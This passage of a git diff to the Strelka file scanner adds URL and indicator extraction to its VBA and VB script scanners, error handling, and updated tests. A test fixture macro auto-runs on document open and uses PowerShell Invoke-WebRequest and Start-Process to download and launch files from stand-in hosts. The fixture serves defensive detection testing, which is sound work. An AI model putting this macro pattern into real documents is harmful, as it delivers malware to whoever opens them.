auty|beer|bentley|berlin|best|bestbuy|bet|bf|bg|bh|bharti|bi|bible|bid|bike|bing|bingo|bio|biz|bj|black|blackfriday|blanco|blockbuster|blog|bloomberg|blue|bm|bms|bmw|bn|bnl|bnpparibas|bo|boats|boehringer|bofa|bom|bond|boo|book|booking|bosch|bostik|boston|bot|boutique|box|br|bradesco|bridgestone|broadway|broker|brother|brussels|bs|bt|budapest|bugatti|build|builders|business|buy|buzz|bv|bw|by|bz|bzh|ca|cab|cafe|cal|call|calvinklein|cam|camera|camp|cancerresearch|canon|capetown|capital|capitalone|car|caravan|cards|care|career|careers|cars|cartier|casa|case|caseih|cash|casino|cat|catering|catholic|cba|cbn|cbre|cbs|cc|cd|ceb|center|ceo|cern|cf|cfa|cfd|cg|ch|chanel|channel|charity|chase|chat|cheap|chintai|christmas|chrome|chrysler|church|ci|cipriani|circle|cisco|citadel|citi|citic|city|cityeats|ck|cl|claims|cleaning|click|clinic|clinique|clothing|cloud|club|clubmed|cm|cn|co|coach|codes|coffee|college|cologne|com|comcast|commbank|community|company|compare|computer|comsec|condos|construction|consulting|contact|contractors|cooking|cookingchannel|cool|coop|corsica|country|coupon|coupons|courses|cr|credit|creditcard|creditunion|cricket|crown|crs|cruise|cruises|csc|cu|cuisinella|cv|cw|cx|cy|cymru|cyou|cz|dabur|dad|dance|data|date|dating|datsun|day|dclk|dds|de|deal|dealer|deals|degree|delivery|dell|deloitte|delta|democrat|dental|dentist|desi|design|dev|dhl|diamonds|diet|digital|direct|directory|discount|discover|dish|diy|dj|dk|dm|dnp|do|docs|doctor|dodge|dog|doha|domains|dot|download|drive|dtv|dubai|duck|dunlop|duns|dupont|durban|dvag|dvr|dz|earth|eat|ec|eco|edeka|edu|education|ee|eg|email|emerck|energy|engineer|engineering|enterprises|epost|epson|equipment|er|ericsson|erni|es|esq|estate|esurance|et|etisalat|eu|eurovision|eus|events|everbank|exchange|expert|exposed|express|extraspace|fage|fail|fairwinds|faith|family|fan|fans|farm|farmers|fashion|fast|fedex|feedback|ferrari|ferrero|fi|fiat|fidelity|fido|film|final|finance|financial|fire|firestone|firmdale|fish|fishing|fit|fitness|fj|fk|flickr|flights|flir|florist|flowers|fly|fm|fo|foo|food|foodnetwork|football|ford|forex|forsale|forum|foundation|fox|fr|free|fresenius|frl|frogans|frontdoor|frontier|ftr|fujitsu|fujixerox|fun|fund|furniture|futbol|fyi|ga|gal|gallery|gallo|gallup|game|games|gap|garden|gb|gbiz|gd|gdn|ge|gea|gent|genting|george|gf|gg|ggee|gh|gi|gift|gifts|gives|giving|gl|glade|glass|gle|global|globo|gm|gmail|gmbh|gmo|gmx|gn|godaddy|gold|goldpoint|golf|goo|goodhands|goodyear|goog|google|gop|got|gov|gp|gq|gr|grainger|graphics|gratis|green|gripe|grocery|group|gs|gt|gu|guardian|gucci|guge|guide|guitars|guru|gw|gy|hair|hamburg|hangout|haus|hbo|hdfc|hdfcbank|health|healthcare|help|helsinki|here|hermes|hgtv|hiphop|hisamitsu|hitachi|hiv|hk|hkt|hm|hn|hockey|holdings|holiday|homedepot|homegoods|homes|homesense|honda|honeywell|horse|hospital|host|hosting|hot|hoteles|hotels|hotmail|house|how|hr|hsbc|ht|hu|hughes|hyatt|hyundai|ibm|icbc|ice|icu|id|ie|ieee|ifm|ikano|il|im|imamat|imdb|immo|immobilien|in|inc|industries|infiniti|info|ing|ink|institute|insurance|insure|int|intel|international|intuit|investments|io|ipiranga|iq|ir|irish|is|iselect|ismaili|ist|istanbul|it|itau|itv|iveco|jaguar|java|jcb|jcp|je|jeep|jetzt|jewelry|jio|jlc|jll|jm|jmp|jnj|jo|jobs|joburg|jot|joy|jp|jpmorgan|jprs|juegos|juniper|kaufen|kddi|ke|kerryhotels|kerrylogistics|kerryproperties|kfh|kg|kh|ki|kia|kim|kinder|kindle|kitchen|kiwi|km|kn|koeln|komatsu|kosher|kp|kpmg|kpn|kr|krd|kred|kuokgroup|kw|ky|kyoto|kz|la|lacaixa|ladbrokes|lamborghini|lamer|lancaster|lancia|lancome|land|landrover|lanxess|lasalle|lat|latino|latrobe|law|lawyer|lb|lc|lds|lease|leclerc|lefrak|legal|lego|lexus|lgbt|li|liaison|lidl|life|lifeinsurance|lifestyle|lighting|like|lilly|limited|limo|lincoln|linde|link|lipsy|live|living|lixil|lk|llc|loan|loans|locker|locus|loft|lol|london|lotte|lotto|love|lpl|lplfinancial|lr|ls|lt|ltd|ltda|lu|lundbeck|lupin|luxe|luxury|lv|ly|ma|macys|madrid|maif|maison|makeup|man|management|mango|map|market|marketing|markets|marriott|marshalls|maserati|mattel|mba|mc|mckinsey|md|me|med|media|meet|melbourne|meme|memorial|men|menu|merckmsd|metlife|mg|mh|miami|microsoft|mil|mini|mint|mit|mitsubishi|mk|ml|mlb|mls|mm|mma|mn|mo|mobi|mobile|mobily|moda|moe|moi|mom|monash|money|monster|mopar|mormon|mortgage|moscow|moto|motorcycles|mov|movie|movistar|mp|mq|mr|ms|msd|mt|mtn|mtr|mu|museum|mutual|mv|mw|mx|my|mz|na|nab|nadex|nagoya|name|nationwide|natura|navy|nba|nc|ne|nec|net|netbank|netflix|network|neustar|new|newholland|news|next|nextdirect|nexus|nf|nfl|ng|ngo|nhk|ni|nico|nike|nikon|ninja|nissan|nissay|nl|no|nokia|northwesternmutual|norton|now|nowruz|nowtv|np|nr|nra|nrw|ntt|nu|nyc|nz|obi|observer|off|office|okinawa|olayan|olayangroup|oldnavy|ollo|om|omega|one|ong|onl|online|onyourside|ooo|open|oracle|orange|org|organic|origins|osaka|otsuka|ott|ovh|pa|page|panasonic|panerai|paris|pars|partners|parts|party|passagens|pay|pccw|pe|pet|pf|pfizer|pg|ph|pharmacy|phd|philips|phone|photo|photography|photos|physio|piaget|pics|pictet|pictures|pid|pin|ping|pink|pioneer|pizza|pk|pl|place|play|playstation|plumbing|plus|pm|pn|pnc|pohl|poker|politie|porn|post|pr|pramerica|praxi|press|prime|pro|prod|productions|prof|progressive|promo|properties|property|protection|pru|prudential|ps|pt|pub|pw|pwc|py|qa|qpon|quebec|quest|qvc|racing|radio|raid|re|read|realestate|realtor|realty|recipes|red|redstone|redumbrella|rehab|reise|reisen|reit|reliance|ren|rent|rentals|repair|report|republican|rest|restaurant|review|reviews|rexroth|rich|richardli|ricoh|rightathome|ril|rio|rip|rmit|ro|rocher|rocks|rodeo|rogers|room|rs|rsvp|ru|rugby|ruhr|run|rw|rwe|ryukyu|sa|saarland|safe|safety|sakura|sale|salon|samsclub|samsung|sandvik|sandvikcoromant|sanofi|sap|sarl|sas|save|saxo|sb|sbi|sbs|sc|sca|scb|schaeffler|schmidt|scholarships|school|schule|schwarz|science|scjohnson|scor|scot|sd|se|search|seat|secure|security|seek|select|sener|services|ses|seven|sew|sex|sexy|sfr|sg|sh|shangrila|sharp|shaw|shell|shia|shiksha|shoes|shop|shopping|shouji|show|showtime|shriram|si|silk|sina|singles|site|sj|sk|ski|skin|sky|skype|sl|sling|sm|smart|smile|sn|sncf|so|soccer|social|softbank|software|sohu|solar|solutions|song|sony|soy|space|spiegel|sport|spot|spreadbetting|sr|srl|srt|st|stada|staples|star|starhub|statebank|statefarm|statoil|stc|stcgroup|stockholm|storage|store|stream|studio|study|style|su|sucks|supplies|supply|support|surf|surgery|suzuki|sv|swatch|swiftcover|swiss|sx|sy|sydney|symantec|systems|sz|tab|taipei|talk|taobao|target|tatamotors|tatar|tattoo|tax|taxi|tc|tci|td|tdk|team|tech|technology|tel|telefonica|temasek|tennis|teva|tf|tg|th|thd|theater|theatre|tiaa|tickets|tienda|tiffany|tips|tires|tirol|tj|tjmaxx|tjx|tk|tkmaxx|tl|tm|tmall|tn|to|today|tokyo|tools|top|toray|toshiba|total|tours|town|toyota|toys|tr|trade|trading|training|travel|travelchannel|travelers|travelersinsurance|trust|trv|tt|tube|tui|tunes|tushu|tv|tvs|tw|tz|ua|ubank|ubs|uconnect|ug|uk|unicom|university|uno|uol|ups|us|uy|uz|va|vacations|vana|vanguard|vc|ve|vegas|ventures|verisign|versicherung|vet|vg|vi|viajes|video|vig|viking|villas|vin|vip|virgin|visa|vision|vistaprint|viva|vivo|vlaanderen|vn|vodka|volkswagen|volvo|vote|voting|voto|voyage|vu|vuelos|wales|walmart|walter|wang|wanggou|warman|watch|watches|weather|weatherchannel|webcam|weber|website|wed|wedding|weibo|weir|wf|whoswho|wien|wiki|williamhill|win|windows|wine|winners|wme|wolterskluwer|woodside|work|works|world|wow|ws|wtc|wtf|xbox|xerox|xfinity|xihuan|xin|xn--11b4c3d|xn--1ck2e1b|xn--1qqw23a|xn--2scrj9c|xn--30rr7y|xn--3bst00m|xn--3ds443g|xn--3e0b707e|xn--3hcrj9c|xn--3oq18vl8pn36a|xn--3pxu8k|xn--42c2d9a|xn--45br5cyl|xn--45brj9c|xn--45q11c|xn--4gbrim|xn--54b7fta0cc|xn--55qw42g|xn--55qx5d|xn--5su34j936bgsg|xn--5tzm5g|xn--6frz82g|xn--6qq986b3xl|xn--80adxhks|xn--80ao21a|xn--80aqecdr1a|xn--80asehdb|xn--80aswg|xn--8y0a063a|xn--90a3ac|xn--90ae|xn--90ais|xn--9dbq2a|xn--9et52u|xn--9krt00a|xn--b4w605ferd|xn--bck1b9a5dre4c|xn--c1avg|xn--c2br7g|xn--cck2b3b|xn--cg4bki|xn--clchc0ea0b2g2a9gcd|xn--czr694b|xn--czrs0t|xn--czru2d|xn--d1acj3b|xn--d1alf|xn--e1a4c|xn--eckvdtc9d|xn--efvy88h|xn--estv75g|xn--fct429k|xn--fhbei|xn--fiq228c5hs|xn--fiq64b|xn--fiqs8s|xn--fiqz9s|xn--fjq720a|xn--flw351e|xn--fpcrj9c3d|xn--fzc2c9e2c|xn--fzys8d69uvgm|xn--g2xx48c|xn--gckr3f0f|xn--gecrj9c|xn--gk3at1e|xn--h2breg3eve|xn--h2brj9c|xn--h2brj9c8c|xn--hxt814e|xn--i1b6b1a6a2e|xn--imr513n|xn--io0a7i|xn--j1aef|xn--j1amh|xn--j6w193g|xn--jlq61u9w7b|xn--jvr189m|xn--kcrx77d1x4a|xn--kprw13d|xn--kpry57d|xn--kpu716f|xn--kput3i|xn--l1acc|xn--lgbbat1ad8j|xn--mgb9awbf|xn--mgba3a3ejt|xn--mgba3a4f16a|xn--mgba7c0bbn0a|xn--mgbaakc7dvf|xn--mgbaam7a8h|xn--mgbab2bd|xn--mgbai9azgqp6j|xn--mgbayh7gpa|xn--mgbb9fbpob|xn--mgbbh1a|xn--mgbbh1a71e|xn--mgbc0a9azcg|xn--mgbca7dzdo|xn--mgberp4a5d4ar|xn--mgbgu82a|xn--mgbi4ecexp|xn--mgbpl2fh|xn--mgbt3dhd|xn--mgbtx2b|xn--mgbx4cd0ab|xn--mix891f|xn--mk1bu44c|xn--mxtq1m|xn--ngbc5azd|xn--ngbe9e0a|xn--ngbrx|xn--node|xn--nqv7f|xn--nqv7fs00ema|xn--nyqy26a|xn--o3cw4h|xn--ogbpf8fl|xn--otu796d|xn--p1acf|xn--p1ai|xn--pbt977c|xn--pgbs0dh|xn--pssy2u|xn--q9jyb4c|xn--qcka1pmc|xn--qxam|xn--rhqv96g|xn--rovu88b|xn--rvc1e0am3e|xn--s9brj9c|xn--ses554g|xn--t60b56a|xn--tckwe|xn--tiq49xqyj|xn--unup4y|xn--vermgensberater-ctb|xn--vermgensberatung-pwb|xn--vhquv|xn--vuq861b|xn--w4r85el8fhu5dnra|xn--w4rs40l|xn--wgbh1c|xn--wgbl6a|xn--xhq521b|xn--xkc2al3hye2a|xn--xkc2dl3a5ee0h|xn--y9a3aq|xn--yfro4i67o|xn--ygbi2ammx|xn--zfr164b|xxx|xyz|yachts|yahoo|yamaxun|yandex|ye|yodobashi|yoga|yokohama|you|youtube|yt|yun|za|zappos|zara|zero|zip|zippo|zm|zone|zuerich|zw)|(?:(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5])\.){3}(?:[0-9]|[1-9]\d|1\d{2}|2[0-4]\d|25[0-5]))(?:[;/][^#?<>\s]*)?(?:\?[^#<>\s]*)?(?:#[^<>\s\(\)]*)?(?!\w))',
+ re.IGNORECASE,
)
- highlight_list = highlight.split(b"\n")
+ def scan(self, data, file, options, expire_at):
+ """
+ Scans the VB script file, tokenizes it, and extracts useful components.
+
+ Args:
+ data: Content of the file being scanned.
+ file: File metadata.
+ options: Scanner options.
+ expire_at: Expiry timestamp of the scan task.
+ """
+ # Tokenize the script data using the Pygments lexer
+ try:
+ # Tokenize the script data using the Pygments lexer
+ highlight = pygments.highlight(
+ data, self.lexer, formatters.RawTokenFormatter()
+ )
+ except Exception as e:
+ self.flags.append(f"highlighting_error: {str(e)[:50]}")
+ return
+
+ try:
+ highlight_list = highlight.split(b"\n")
+ except Exception as e:
+ self.flags.append(f"highlight_split_error: {str(e)[:50]}")
+ return
+
+ # Initialize containers for script components
ordered_highlights = []
+
for hl in highlight_list:
- split_highlight = hl.split(b"\t")
- if len(split_highlight) == 2:
- token = split_highlight[0].decode()
- value = split_highlight[1].decode().strip("'\"").strip()
- highlight_entry = {"token": token, "value": value}
- if highlight_entry["value"]:
- ordered_highlights.append(highlight_entry)
+ try:
+ split_highlight = hl.split(b"\t")
+ if len(split_highlight) == 2:
+ token, value = split_highlight
+ token = token.decode()
+ value = value.decode().strip("'\"").strip()
+ # Add non-empty values to the ordered highlights
+ if value:
+ ordered_highlights.append({"token": token, "value": value})
+ except Exception as e:
+ self.flags.append(f"token_parsing_error: {str(e)[:50]}")
+
+ # Initialize event fields to store extracted data
self.event.setdefault("tokens", [])
self.event.setdefault("comments", [])
self.event.setdefault("functions", [])
self.event.setdefault("names", [])
self.event.setdefault("operators", [])
self.event.setdefault("strings", [])
+ self.event.setdefault("urls", [])
+
+ # Get script length
+ self.event["script_length_bytes"] = len(data)
+
+ # Process and categorize each token
+ try:
+ for ohlp in ordered_highlights:
+ self.categorize_token(ohlp)
+ except Exception as e:
+ self.flags.append(f"token_categorization_error: {str(e)[:50]}")
+
+ # Remove duplicates and add URLs as IOCs
+ try:
+ if self.event["urls"]:
+ self.event["urls"] = list(set(self.event["urls"]))
+ self.add_iocs(self.event["urls"])
+ except Exception as e:
+ self.flags.append(f"ioc_extraction_error: {str(e)[:50]}")
+
+ def categorize_token(self, ohlp):
+ """
+ Categorizes a token and extracts relevant information.
+
+ Args:
+ ohlp: A dictionary containing a token and its value.
+ """
+ token, value = ohlp["token"], ohlp["value"]
+
+ if token not in self.event["tokens"]:
+ self.event["tokens"].append(token)
+
+ if token == "Token.Comment":
+ if value not in self.event["comments"]:
+ self.event["comments"].append(value)
+ self.extract_urls(value)
+
+ elif token == "Token.Name.Function":
+ if value not in self.event["functions"]:
+ self.event["functions"].append(value)
+
+ elif token == "Token.Name":
+ if value not in self.event["names"]:
+ self.event["names"].append(value)
+
+ elif token == "Token.Operator":
+ if value not in self.event["operators"]:
+ self.event["operators"].append(value)
+
+ elif token == "Token.Literal.String":
+ if value not in self.event["strings"]:
+ self.event["strings"].append(value)
+ self.extract_urls(value)
+
+ def extract_urls(self, text):
+ """
+ Extracts URLs from the provided text using regex matching.
- position = 0
- while position < len(ordered_highlights):
- ohlp = ordered_highlights[position]
- if ohlp["token"] not in self.event["tokens"]:
- self.event["tokens"].append(ohlp["token"])
- if ohlp["token"] == "Token.Comment":
- if ohlp["value"] not in self.event["comments"]:
- self.event["comments"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Name.Function":
- if ohlp["value"] not in self.event["functions"]:
- self.event["functions"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Name":
- if ohlp["value"] not in self.event["names"]:
- self.event["names"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Operator":
- if ohlp["value"] not in self.event["operators"]:
- self.event["operators"].append(ohlp["value"])
- elif ohlp["token"] == "Token.Literal.String":
- if ohlp["value"] not in self.event["strings"]:
- self.event["strings"].append(ohlp["value"])
- position += 1
+ Args:
+ text: Text content from which URLs are to be extracted.
+ """
+ try:
+ urls = self.url_regex.findall(text)
+ for url in urls:
+ if url not in self.event["urls"]:
+ self.event["urls"].append(url)
+ except Exception as e:
+ self.flags.append(f"url_extraction_error: {str(e)[:50]}")
diff --git a/src/python/strelka/scanners/scan_vba.py b/src/python/strelka/scanners/scan_vba.py
index fa11de10..c07b8544 100644
--- a/src/python/strelka/scanners/scan_vba.py
+++ b/src/python/strelka/scanners/scan_vba.py
@@ -16,8 +16,8 @@ class ScanVba(strelka.Scanner):
"""
def scan(self, data, file, options, expire_at):
+ vba = None
analyze_macros = options.get("analyze_macros", True)
-
self.event["total"] = {"files": 0, "extracted": 0}
try:
@@ -58,8 +58,13 @@ def scan(self, data, file, options, expire_at):
elif macro_type == "Suspicious":
self.event["suspicious"].append(keyword)
+ if self.event["ioc"]:
+ self.add_iocs(list(set(self.event["ioc"])))
+
except olevba.FileOpenError:
self.flags.append("file_open_error")
+ except AttributeError:
+ self.flags.append("attribute_error")
finally:
- # TODO referenced before potential assignment as vba is opened in a try / catch block
- vba.close()
+ if vba:
+ vba.close()
diff --git a/src/python/strelka/scanners/scan_zip.py b/src/python/strelka/scanners/scan_zip.py
index 784bb03e..58181043 100644
--- a/src/python/strelka/scanners/scan_zip.py
+++ b/src/python/strelka/scanners/scan_zip.py
@@ -110,7 +110,7 @@ def scan(self, data, file, options, expire_at):
except RuntimeError:
self.flags.append("runtime_error")
except pyzipper.BadZipFile:
- self.flags.append("bad_zip")
+ self.flags.append("bad_zip_file")
except zlib.error:
self.flags.append("zlib_error")
@@ -131,10 +131,15 @@ def scan(self, data, file, options, expire_at):
self.flags.append("zlib_error")
# Top level compression metric
- size_difference_total = file_size_total - compress_size_total
- self.event["compression_rate"] = round(
- (size_difference_total * 100.0) / file_size_total, 2
- )
+ try:
+ size_difference_total = file_size_total - compress_size_total
+ self.event["compression_rate"] = round(
+ (size_difference_total * 100.0) / file_size_total, 2
+ )
+ except ZeroDivisionError:
+ self.flags.append("file_size_zero")
except pyzipper.BadZipFile:
- self.flags.append("bad_zip")
+ self.flags.append("bad_zip_file")
+ except ValueError:
+ self.flags.append("value_error")
diff --git a/src/python/strelka/tests/fixtures/test.pdf b/src/python/strelka/tests/fixtures/test.pdf
old mode 100755
new mode 100644
index 4c147ed2..e4cf4094
Binary files a/src/python/strelka/tests/fixtures/test.pdf and b/src/python/strelka/tests/fixtures/test.pdf differ
diff --git a/src/python/strelka/tests/fixtures/test.vba b/src/python/strelka/tests/fixtures/test.vba
new file mode 100644
index 00000000..dd3300ba
--- /dev/null
+++ b/src/python/strelka/tests/fixtures/test.vba
@@ -0,0 +1,30 @@
+Option Explicit
+Sub AutoOpen()
+'
+' AutoOpen Macro
+'
+
+MsgBox "Hello World!"
+
+End Sub
+
+
+Private Sub Document_Open()
+
+MsgBox "Hello World!"
+
+End Sub
+
+Private Sub Testing_Iocs()
+
+Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
+Set objStartup = objWMIService.Get("Win32_ProcessStartup")
+Set objConfig = objStartup.SpawnInstance_
+objConfig.ShowWindow = 0
+Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
+ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.example.com -OutFile $env:tmp\test.txt
+Start-Process -Filepath $env:tmp\invoice.one"
+ExecuteCmdAsync "cmd /c powershell Invoke-WebRequest -Uri https://www.test.com/test.bat -OutFile $env:tmp\test.bat
+Start-Process -Filepath $env:tmp\test.bat"
+
+End Sub
\ No newline at end of file
diff --git a/src/python/strelka/tests/test_scan_ole.py b/src/python/strelka/tests/test_scan_ole.py
index 8867edd1..29c3b821 100644
--- a/src/python/strelka/tests/test_scan_ole.py
+++ b/src/python/strelka/tests/test_scan_ole.py
@@ -57,8 +57,8 @@ def test_scan_ole_doc_pe(mocker):
test_scan_event = {
"elapsed": mock.ANY,
- "flags": ["attribute_error_in_stream"],
- "total": {"streams": 10, "extracted": 9},
+ "flags": [],
+ "total": {"streams": 10, "extracted": 10},
}
scanner_event = run_test_scan(
@@ -79,8 +79,8 @@ def test_scan_ole_doc_pe_classic(mocker):
test_scan_event = {
"elapsed": mock.ANY,
- "flags": ["attribute_error_in_stream"],
- "total": {"streams": 13, "extracted": 12},
+ "flags": [],
+ "total": {"streams": 13, "extracted": 13},
}
scanner_event = run_test_scan(
diff --git a/src/python/strelka/tests/test_scan_pdf.py b/src/python/strelka/tests/test_scan_pdf.py
index 10fd00c0..de5204c7 100644
--- a/src/python/strelka/tests/test_scan_pdf.py
+++ b/src/python/strelka/tests/test_scan_pdf.py
@@ -17,9 +17,84 @@ def test_scan_pdf(mocker):
"elapsed": mock.ANY,
"flags": [],
"images": 1,
- "lines": 34,
- "links": [],
- "words": 418,
+ "lines": 32,
+ "links": unordered(
+ ["http://bing.com", "https://duckduckgo.com", "https://google.com"]
+ ),
+ "words": 421,
+ "xref_object": unordered(
+ [
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>/Border[0 0 0]/Rect[74.8708 81.507 171.716 95.5623]/Subtype/Link/Type/Annot>>",
+ "<>",
+ "[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 333 0 0 611 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 444 0 0 0 0 0 0 0 778 0 500 500 0 333 389 0 500]",
+ "<>",
+ "<>",
+ "<>/MediaBox[0 0 612 792]/Parent 2 0 R/Resources<>/Font<>/ProcSet[/PDF/Text/ImageC]/XObject<>>>/StructParents 0/Tabs/S/Type/Page>>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>/Border[0 0 0]/Rect[382.256 32.834 472.048 46.8893]/Subtype/Link/Type/Annot>>",
+ "<>",
+ "<>",
+ "<>",
+ "null",
+ "<>",
+ "<>/Metadata 53 0 R/Pages 2 0 R/StructTreeRoot 15 0 R/Type/Catalog>>",
+ "<>",
+ "<>",
+ "<>",
+ "[46 0 R 47 0 R 48 0 R 49 0 R]",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "<>",
+ "[57 0 R]",
+ "<>",
+ "<>",
+ "<>/Filter/FlateDecode/ID[<996084F03FED2848AB7A00AD5BCAA8E6>